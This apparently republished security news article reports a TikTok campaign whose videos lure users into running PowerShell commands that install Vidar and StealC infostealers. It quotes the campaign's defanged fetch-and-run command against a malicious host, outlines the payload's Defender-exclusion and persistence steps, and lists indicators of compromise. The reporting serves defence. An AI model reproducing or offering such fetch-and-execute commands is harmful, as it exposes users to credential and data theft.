Beware of Trending TikTok Videos Promoting Pirated Apps That Deliver Stealer Malware

Beware of Trending TikTok Videos Promoting Pirated Apps That Deliver Stealer Malware

A sophisticated social engineering campaign has surfaced on TikTok, leveraging the platform’s massive user base and algorithmic reach to distribute information-stealing malware, specifically Vidar and StealC.

Identified by Trend Research, this attack uses potentially AI-generated videos to deceive users into executing malicious PowerShell commands under the guise of activating pirated software like Windows OS, Microsoft Office, CapCut, and Spotify.

Unlike traditional malware delivery methods such as fake CAPTCHA pages, this campaign relies entirely on video content to socially engineer victims, making it harder for conventional security tools to detect and block the threat.

– Advertisement –

Emerging Social Engineering Threat on Social Media

The campaign begins with TikTok accounts, such as @gitallowed and others like @zane.houghton and @allaivo2, posting instructional videos that guide users to run PowerShell commands.

Stealer Malware
The profile page of a TikTok user account

These videos, which have garnered significant engagement one reaching over 500,000 views present step-by-step instructions to press Windows + R, type “powershell,” and execute a command like “iex (irm hxxps://allaivo[.]me/spotify)” to download a malicious script.

This script (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) creates hidden directories in APPDATA and LOCALAPPDATA, adds them to Windows Defender exclusions, and fetches a secondary payload identified as Vidar or StealC from URLs like hxxps://amssh[.]co/file.exe.

Stealer Malware
malicious PowerShell script

Technical Breakdown of the Attack Chain

The malware establishes persistence via registry keys and connects to command-and-control (C&C) servers, including hxxps://steamcommunity[.]com/profiles/76561199846773220 for Vidar, often using legitimate services like Steam and Telegram as Dead Drop Resolvers to mask C&C infrastructure.

The attack’s use of AI-generated content and verbal instructions within videos highlights a shift towards scalable, evasive tactics that exploit user trust rather than detectable code .

The implications for both individuals and businesses are severe, as Vidar and StealC can lead to data exfiltration, credential theft, and compromise of sensitive systems.

With no malicious code embedded in the platform itself, traditional defenses like link scanning or domain reputation checks are less effective.

According to the Report, Trend Vision One offers detection and blocking of associated Indicators of Compromise (IOCs), alongside hunting queries and threat intelligence to help organizations identify and mitigate this threat early.

Security strategies must now prioritize social media monitoring, behavioral analysis for anomalous PowerShell usage, and enhanced user education to combat such visually and aurally delivered attacks.

Indicators of Compromise (IOCs)

Type Indicator
File Hash 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b
File Hash afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5
File Hash b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886
URL hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php
URL hxxps://allaivo[.]me/spotify
URL hxxps://amssh[.]co/file[.]exe
URL hxxps://amssh[.]co/script[.]ps1
URL hxxps://steamcommunity[.]com/profiles/76561199846773220
URL hxxps://t[.]me/v00rd
IP hxxps://49[.]12[.]113[.]201
IP hxxps://116[.]202[.]6[.]216

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates


Source link